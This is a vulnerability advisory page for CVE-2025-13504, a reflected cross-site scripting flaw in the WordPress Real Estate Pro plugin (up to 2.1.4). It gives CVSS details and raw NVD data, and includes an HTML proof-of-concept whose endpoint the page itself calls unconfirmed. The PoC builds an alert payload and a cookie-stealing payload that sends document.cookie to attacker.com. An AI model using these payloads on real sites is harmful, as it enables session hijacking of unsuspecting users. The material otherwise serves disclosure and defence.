Security Vulnerability Report
CVE-2025-13504 CVSS 7.1 HIGH


Published: 2026-01-08 10:15:46
Last Modified: 2026-04-27 17:16:24

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in e-plugins Real Estate Pro real-estate-pro allows Reflected XSS. This issue affects Real Estate Pro: from n/a through <= 2.1.4.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration (CPE) data is available for this record. Affected product as stated in the description:

Real Estate Pro <= 2.1.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-13504 PoC - Reflected XSS in Real Estate Pro Plugin -->
<!-- Target: WordPress Real Estate Pro Plugin <= 2.1.4 -->
<!-- Attack Vector: Malicious URL with JavaScript payload -->
<!-- Note: the endpoint and parameter names below are those given by this PoC; the NVD
     record does not confirm them. See the Patchstack advisory in the References. -->
<!DOCTYPE html>
<html>
<head>
  <title>CVE-2025-13504 PoC</title>
</head>
<body>
  <h2>CVE-2025-13504 - Real Estate Pro Reflected XSS PoC</h2>

  <!-- Malicious URL - Replace YOUR_TARGET with actual domain -->
  <p>Malicious URL:</p>
  <code id="maliciousUrl"></code>

  <script>
    // Construct the malicious URL
    // The XSS payload is injected through URL parameters that are reflected without sanitization
    const targetBase = 'http://YOUR_TARGET/wp-admin/admin.php';
    // The closing tag is written as "<\/script>" so that the string literal does not
    // terminate this <script> element while the HTML parser reads the page
    const xssPayload = '<script>alert("XSS - CVE-2025-13504")<\/script>';
    const maliciousUrl = targetBase + '?page=real_estate_pro&search=' + encodeURIComponent(xssPayload);
    document.getElementById('maliciousUrl').textContent = maliciousUrl;

    // Alternative payload for cookie stealing
    const cookieStealPayload = '<img src=x onerror="fetch(\'https://attacker.com/steal?cookie=\'+document.cookie)">';
    const cookieStealUrl = targetBase + '?page=real_estate_pro&search=' + encodeURIComponent(cookieStealPayload);
    console.log('Cookie stealing URL:', cookieStealUrl);
  </script>

  <!-- Attack Steps:
       1. Attacker crafts a URL with XSS payload in search parameter
       2. Victim is tricked into clicking the malicious link
       3. Server reflects the unsanitized input in response
       4. Victim's browser executes the malicious JavaScript
       5. Attacker steals session cookies or performs other malicious actions -->
</body>
</html>

References

Patchstack advisory (from the record's references):
https://patchstack.com/database/Wordpress/Plugin/real-estate-pro/vulnerability/wordpress-real-estate-pro-plugin-2-1-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve

Weakness: CWE-79 (from the record's weaknesses)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-13504",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-08T10:15:45.517",
    "lastModified": "2026-04-27T17:16:24.233",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in e-plugins Real Estate Pro real-estate-pro allows Reflected XSS.This issue affects Real Estate Pro: from n/a through <= 2.1.4."
      },
      {
        "lang": "es",
        "value": "Neutralización incorrecta de la entrada durante la generación de páginas web ('cross-site scripting') vulnerabilidad en e-plugins Real Estate Pro real-estate-pro permite XSS Reflejado. Este problema afecta a Real Estate Pro: desde n/a hasta &lt;= 2.1.4."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://patchstack.com/database/Wordpress/Plugin/real-estate-pro/vulnerability/wordpress-real-estate-pro-plugin-2-1-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve",
        "source": "[email protected]"
      }
    ]
  }
}